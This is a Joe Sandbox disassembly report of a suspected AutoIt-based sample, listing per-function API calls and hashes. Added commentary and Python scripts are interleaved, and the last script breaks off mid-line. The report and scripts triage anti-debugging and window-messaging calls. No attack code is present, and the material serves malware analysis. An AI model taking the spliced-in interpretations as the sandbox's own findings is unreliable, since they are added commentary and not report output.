                                                                                              APIs
                                                                                              • __snwprintf.LIBCMT ref: 00A83A66
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: __snwprintf_memmove
                                                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                              • API String ID: 3506404897-2584243854
                                                                                              • Opcode ID: 8b5ed8ea192b0dda8e04436d997f204ab9de4746fd8fbb9cc156f526147c4893
                                                                                              • Instruction ID: 458a454234aba74d98e4b80c4eb93412ffffd4e40a3e49622e55778e8255fb4d
                                                                                              • Opcode Fuzzy Hash: 8b5ed8ea192b0dda8e04436d997f204ab9de4746fd8fbb9cc156f526147c4893
                                                                                              • Instruction Fuzzy Hash: E3216F31600219AECF14FF64CD82EEEB7B9BF44B40F544859F445AB181DB35EA85CBA1
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A96761
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A9676C
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: Combobox
                                                                                              • API String ID: 3850602802-2096851135
                                                                                              • Opcode ID: 840f630a46eb4cc8f4cc19cee7420ed4a69ab175e2abe12e3aa3dffeae4e6e43
                                                                                              • Instruction ID: f9979ebdf40e743043e4a26b9ec0ce298fff29cf589dd2b4c3b28910e45c8af0
                                                                                              • Opcode Fuzzy Hash: 840f630a46eb4cc8f4cc19cee7420ed4a69ab175e2abe12e3aa3dffeae4e6e43
                                                                                              • Instruction Fuzzy Hash: B411B271300208BFEF11CF94DC80EFB37AAEF483A8F110129F9149B290D6319C5187A0
                                                                                              APIs
                                                                                                • Part of subcall function 00A11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A11D73
                                                                                                • Part of subcall function 00A11D35: GetStockObject.GDI32(00000011), ref: 00A11D87
                                                                                                • Part of subcall function 00A11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A11D91
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A96C71
                                                                                              • GetSysColor.USER32(00000012), ref: 00A96C8B
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                              • String ID: static
                                                                                              • API String ID: 1983116058-2160076837
                                                                                              • Opcode ID: 10a4bbe2e5a4a6428221d77f6166aa469523f0a09ddab0a6da592c4b6342491b
                                                                                              • Instruction ID: 7f007b0a814bc0565d0f7160034611f68041941dd45540423712e69211426af4
                                                                                              • Opcode Fuzzy Hash: 10a4bbe2e5a4a6428221d77f6166aa469523f0a09ddab0a6da592c4b6342491b
                                                                                              • Instruction Fuzzy Hash: 1F212972610209AFDF04DFB8CD45AEA7BF8FF08314F154629F995D2250D635E851DB60
                                                                                              APIs
                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 00A969A2
                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A969B1
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: LengthMessageSendTextWindow
                                                                                              • String ID: edit
                                                                                              • API String ID: 2978978980-2167791130
                                                                                              • Opcode ID: e2be66e0a3c8d191f334d7c6da7b85b44956c9b15f7a5da5201f1f99822dcc51
                                                                                              • Instruction ID: 9a639fd11dc776b5626acb2067747e6213e299ade167b5206272ac4ebc97b43d
                                                                                              • Opcode Fuzzy Hash: e2be66e0a3c8d191f334d7c6da7b85b44956c9b15f7a5da5201f1f99822dcc51
                                                                                              • Instruction Fuzzy Hash: 7C113A71611208AFEF108F649C45EEB37A9EF053B8F604724F9A5961E0CB75DC91A760
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A72A22
                                                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00A72A41
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoItemMenu_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 2223754486-4108050209
                                                                                              • Opcode ID: f24bad5f396272ecab98d174959c1ba20dd5db02afb3ce9b9b189bc913cc7230
                                                                                              • Instruction ID: 9f531d54bf678cecf155d14d4b0f231ccfa565d2ade665b18a72b72bcfeb0c8d
                                                                                              • Opcode Fuzzy Hash: f24bad5f396272ecab98d174959c1ba20dd5db02afb3ce9b9b189bc913cc7230
                                                                                              • Instruction Fuzzy Hash: 93119072D01114ABDB30DBA9DC44BAA77B8AB45390F15C032E95DE72A0D770AD0AD791
                                                                                              APIs
                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A8222C
                                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A82255
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$OpenOption
                                                                                              • String ID: <local>
                                                                                              • API String ID: 942729171-4266983199
                                                                                              • Opcode ID: 66dff498f51120aaeb1bcb9cd9fc4054399aa5f31d7a76a1e2f9742fa9f44b77
                                                                                              • Instruction ID: f7f76d880d3ba0196c612b484a32bc92d9d6e76556b3cec88b9d9fdac568be6c
                                                                                              • Opcode Fuzzy Hash: 66dff498f51120aaeb1bcb9cd9fc4054399aa5f31d7a76a1e2f9742fa9f44b77
                                                                                              • Instruction Fuzzy Hash: 6511CEB0641225BEDB25AF518CC8FFBFBA8FF16751F10822AF91586000E6706991D7F0
                                                                                              APIs
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                                • Part of subcall function 00A6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00A6AABC
                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A68E73
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 372448540-1403004172
                                                                                              • Opcode ID: a5b53473d18bf65d21b50c5661ecfd959507a6f3e887423359977c4afe26a46d
                                                                                              • Instruction ID: 1b18f19cbb42156765b8f5a31ddc387439fc7c8fb443af7bd6da5f1af99eb64d
                                                                                              • Opcode Fuzzy Hash: a5b53473d18bf65d21b50c5661ecfd959507a6f3e887423359977c4afe26a46d
                                                                                              • Instruction Fuzzy Hash: 3301F1B5A01218AB8B14EBF0CD41DFE737CAF11320B440A1AF831672E1DE369848CA50
                                                                                              APIs
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                                • Part of subcall function 00A6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00A6AABC
                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00A68D6B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 372448540-1403004172
                                                                                              • Opcode ID: 5d31d5d202dd514d16fc3a458ecae4ea3c358a8c49052fc851bdda1f1bd37925
                                                                                              • Instruction ID: eec804be1e8cc4fe2c9634c9e131a4ddc66f61ab926965905ab2fcc4fdb3e95f
                                                                                              • Opcode Fuzzy Hash: 5d31d5d202dd514d16fc3a458ecae4ea3c358a8c49052fc851bdda1f1bd37925
                                                                                              • Instruction Fuzzy Hash: 9701DF75A41108FBCB15EBE0CA52EFE73BC9F25340F50011AB902672E1DE245E48DA72
                                                                                              APIs
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                                • Part of subcall function 00A6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00A6AABC
                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00A68DEE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 372448540-1403004172
                                                                                              • Opcode ID: 5b8a457e0a62a265c386571c53d9cc5948ce96fb84d0a40809a4b26d25cbac70
                                                                                              • Instruction ID: 7d7c160b5a894f73574c50002143d13d11a0c1292e45fbe48ea803e9bacd7c3c
                                                                                              • Opcode Fuzzy Hash: 5b8a457e0a62a265c386571c53d9cc5948ce96fb84d0a40809a4b26d25cbac70
                                                                                              • Instruction Fuzzy Hash: 7001FDB1A41108FBDB10EBE4CA42EFE73BC9F21340F50411AB902B32D2DE254E08DA72
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName_wcscmp
                                                                                              • String ID: #32770
                                                                                              • API String ID: 2292705959-463685578
                                                                                              • Opcode ID: 27f3e774622591f8ff8bec2894f209a4dbd8f0fdb62b35ef1239d481e4cc4e17
                                                                                              • Instruction ID: 82583f078fa0696f88862c34af005bc3477a2cfe237e2a5e92df2f546cd6f4ae
                                                                                              • Opcode Fuzzy Hash: 27f3e774622591f8ff8bec2894f209a4dbd8f0fdb62b35ef1239d481e4cc4e17
                                                                                              • Instruction Fuzzy Hash: FFE092326042282AE720DB99AC4AFA7F7ACEB45B60F01006BFD04D6051DA609A5687E1
                                                                                              APIs
                                                                                                • Part of subcall function 00A4B314: _memset.LIBCMT ref: 00A4B321
                                                                                                • Part of subcall function 00A30940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A4B2F0,?,?,?,00A1100A), ref: 00A30945
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,00A1100A), ref: 00A4B2F4
                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A1100A), ref: 00A4B303
                                                                                              Strings
                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A4B2FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                              • API String ID: 3158253471-631824599
                                                                                              • Opcode ID: df05f1b9b62b65311ca5c7c3cc9ae569b4f7e398a6220cfb49ab8df113f2ea96
                                                                                              • Instruction ID: 639c44493b851943d961d7cc52c4aac7d152cd3a57402155cf79a39229d8749e
                                                                                              • Opcode Fuzzy Hash: df05f1b9b62b65311ca5c7c3cc9ae569b4f7e398a6220cfb49ab8df113f2ea96
                                                                                              • Instruction Fuzzy Hash: 1AE06D742107108FD720DF6AD5047867BE8AF44344F00892EE456CB651EBB4E445CBB1
                                                                                              APIs
                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00A67C82
                                                                                                • Part of subcall function 00A33358: _doexit.LIBCMT ref: 00A33362
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message_doexit
                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                              • API String ID: 1993061046-4017498283
                                                                                              • Opcode ID: f2b338057a395658073f5e03d6ef69d5e67e8e859e35b965ec5abc2275081dcf
                                                                                              • Instruction ID: 6cb1fccadfd489b246915b4612c1e4d054ce374a50ce72564d10a56a055e4834
                                                                                              • Opcode Fuzzy Hash: f2b338057a395658073f5e03d6ef69d5e67e8e859e35b965ec5abc2275081dcf
                                                                                              • Instruction Fuzzy Hash: 41D05B323C935C36D21533A96D07FCE75488F05F57F144826FB04995D34DD6859141E5
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00A51775
                                                                                                • Part of subcall function 00A8BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00A5195E,?), ref: 00A8BFFE
                                                                                                • Part of subcall function 00A8BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00A8C010
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00A5196D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                              • String ID: WIN_XPe
                                                                                              • API String ID: 582185067-3257408948
                                                                                              • Opcode ID: b5220dd0344504f72e97a91f516f68333ea99e5145204d9900574a0d02634e9a
                                                                                              • Instruction ID: 1b36447774c20a08ecd55f897d388fc1caf8b782c3c365703a4aad7dac5fb2c0
                                                                                              • Opcode Fuzzy Hash: b5220dd0344504f72e97a91f516f68333ea99e5145204d9900574a0d02634e9a
                                                                                              • Instruction Fuzzy Hash: 88F0C970801109EFDB15DB95CA84BFCBBF8BB0C302F641096E512A61A1DB758F89DF60
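                                                                                              Added example (not part of the Joe Sandbox report or of its IDA plugin): a Python triage script that parses the per-function records in this section and flags the ones whose direct API calls suggest debugger detection. The record at 00A4B2F4 is the case worth handling with care: IsDebuggerPresent followed by OutputDebugStringW with the string "ERROR : Unable to initialize critical section in CAtlBaseModule" is the constructor of ATL's CAtlBaseModule (atlcore.h), which only reaches those calls when InitializeCriticalSectionAndSpinCount fails, so it is compiler-library boilerplate rather than the sample's own anti-analysis logic, and the script classifies it that way. The two embedded sample records are copied from this section with the Associated and Instruction lines trimmed; the API name set and the category labels are the example's own choices, not Joe Sandbox's.

```python
"""Triage helper for the Joe Sandbox per-function records in this section
(added example; not part of the report or of Joe Sandbox).  Parses the
'APIs' / 'Strings' / 'Similarity' layout, flags records whose direct calls
look like debugger detection, and recognises one well-known benign source:
ATL's CAtlBaseModule constructor, which only reaches
IsDebuggerPresent/OutputDebugStringW if critical-section init fails."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# APIs malware commonly uses to detect a debugger.  A hint, not a verdict.
ANTI_DEBUG_APIS = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent", "OutputDebugStringA",
                   "OutputDebugStringW", "NtQueryInformationProcess"}
# Diagnostic string hard-coded in ATL's CAtlBaseModule constructor (atlcore.h).
ATL_INIT_FAILURE = "ERROR : Unable to initialize critical section in CAtlBaseModule"

# via_subcall is True for "Part of subcall function ..." lines.
ApiCall = namedtuple("ApiCall", "name module args ref via_subcall")


@dataclass
class FuncRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""


_API_LINE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
_STR_LINE = re.compile(r"^•\s*(?P<s>.*),\s*xrefs:\s*[0-9A-F]+$")
_SECTIONS = {"APIs", "Strings", "Memory Dump Source",
             "Joe Sandbox IDA Plugin", "Similarity"}
_META = (("API ID: ", "api_id"), ("String ID: ", "string_id"),
         ("Opcode ID: ", "opcode_id"))


def parse_records(text: str) -> list:
    """Split the listing into FuncRecords; each 'APIs' header starts a new one."""
    records, section, rec = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in _SECTIONS:
            if line == "APIs":
                rec = FuncRecord()
                records.append(rec)
            section = line
        elif rec is None or not line.startswith("•"):
            continue
        elif section == "APIs" and (m := _API_LINE.match(line)):
            rec.apis.append(ApiCall(m["name"], m["mod"], m["args"] or "",
                                    m["ref"], m["sub"] is not None))
        elif section == "Strings" and (m := _STR_LINE.match(line)):
            rec.strings.append(m["s"])
        elif section == "Similarity":
            body = line[1:].strip()
            for key, attr in _META:
                if body.startswith(key):
                    setattr(rec, attr, body[len(key):])
    return records


def classify(rec: FuncRecord) -> str:
    """Return 'anti-debug', 'library-boilerplate' or 'none' for one record."""
    hits = [c.name for c in rec.apis
            if c.name in ANTI_DEBUG_APIS and not c.via_subcall]
    if not hits:
        return "none"
    if ATL_INIT_FAILURE in rec.strings:
        return "library-boilerplate"  # ATL's constructor, not the sample's logic
    return "anti-debug"


def triage(text: str) -> list:
    """(API ID, classification) per record, in listing order."""
    return [(r.api_id, classify(r)) for r in parse_records(text)]


# Two records copied from this section (Associated/Instruction lines trimmed).
SAMPLE_RECORDS = """\
APIs
  • Part of subcall function 00A4B314: _memset.LIBCMT ref: 00A4B321
• IsDebuggerPresent.KERNEL32(?,?,?,00A1100A), ref: 00A4B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A1100A), ref: 00A4B303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A4B2FE
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• API String ID: 3158253471-631824599
• Opcode ID: df05f1b9b62b65311ca5c7c3cc9ae569b4f7e398a6220cfb49ab8df113f2ea96
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A8222C
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A82255
Strings
Similarity
• API ID: Internet$OpenOption
• Opcode ID: 66dff498f51120aaeb1bcb9cd9fc4054399aa5f31d7a76a1e2f9742fa9f44b77
"""

if __name__ == "__main__":
    for api_id, verdict in triage(SAMPLE_RECORDS):
        print(f"{verdict:20s} {api_id}")
```

                                                                                              The second sample record can be read the same way: InternetSetOptionW with option 0x32 is INTERNET_OPTION_CONNECTED_STATE, and the 8-byte buffer length matches INTERNET_CONNECTED_INFO, so this is the runtime forcing the WinINet session into the connected state, not proxy or certificate tampering. The "AutoIt" caption of the MessageBoxW at 00A67C82 and the WIN_XPe string (one of the AutoIt runtime's @OSVersion values) near 00A51775 likewise belong to the AutoIt interpreter the script is compiled into, so the GUI, menu and OS-detection records around them describe interpreter code rather than script behaviour. The Opcode IDs and API String IDs the parser keeps are the useful pivots for finding the same functions in other samples.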
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A959AE
• PostMessageW.USER32(00000000), ref: 00A959B5
  • Part of subcall function 00A75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A752BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: f89c099b82206d6fd638062af70c796ba82b6d272c82910f59dd08a252629b99
• Instruction ID: 851fe1cc8dc8d3c13791d5cd9f3593cd229a8399c2e5e8ac8b876e0a431a9e7c
• Opcode Fuzzy Hash: f89c099b82206d6fd638062af70c796ba82b6d272c82910f59dd08a252629b99
• Instruction Fuzzy Hash: AFD0C9317803117BE664ABB09C0BFD76614BB04B50F01482AB34AEA1D1CDE4A801C694
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A9596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A95981
  • Part of subcall function 00A75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A752BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 77acfaf195a175a3222587164ecc9e32a2dc9b8917a9278101ba7e6e1bf9548b
• Instruction ID: ef0df030c660ba7d5620b4be8375715e24008f6ba63db54e8bef12a7d95be6bc
• Opcode Fuzzy Hash: 77acfaf195a175a3222587164ecc9e32a2dc9b8917a9278101ba7e6e1bf9548b
• Instruction Fuzzy Hash: CED01231784311BBE664FBB09C0FFD76A14BF00B50F01483AB34AEA1D1CDE49801C694
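The two FindWindowW/PostMessageW records above are the kind of block an analyst has to decode by hand: the report prints DWORD arguments as raw hex, so `00000111` is the standard Win32 message WM_COMMAND and `00000197` is wParam 0x197 (407), a command ID the report does not name (it is the taskbar window class `Shell_TrayWnd` that receives it). The parser below is an added example, not part of the Joe Sandbox report or its IDA plugin: it reads the "APIs" bullet format shown in these records, resolves the message constant for Post/SendMessage calls, and pairs it with the window class looked up by FindWindow. The message table is limited to a handful of winuser.h constants I am certain of; the sample lines are copied from the record above and labelled as constructed input.

```python
import re

# Standard Win32 window-message constants (winuser.h); only a few are listed,
# unknown values are printed as hex by describe_message().
WM_NAMES = {
    0x0010: "WM_CLOSE",
    0x0100: "WM_KEYDOWN",
    0x0101: "WM_KEYUP",
    0x0111: "WM_COMMAND",
    0x0112: "WM_SYSCOMMAND",
    0x0400: "WM_USER",
}

MESSAGE_APIS = {"PostMessageA", "PostMessageW", "SendMessageA", "SendMessageW"}
FINDWINDOW_APIS = {"FindWindowA", "FindWindowW"}

# One "APIs" bullet of a Joe Sandbox function record, e.g.
#   PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A95981
# The "Part of subcall function ...:" prefix is skipped because search()
# returns the leftmost "Name.MODULE(" match, which is the API itself.
API_LINE = re.compile(
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{6,8})"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")


def parse_arg(token):
    """The report prints DWORD args as 8 hex digits, string args verbatim and
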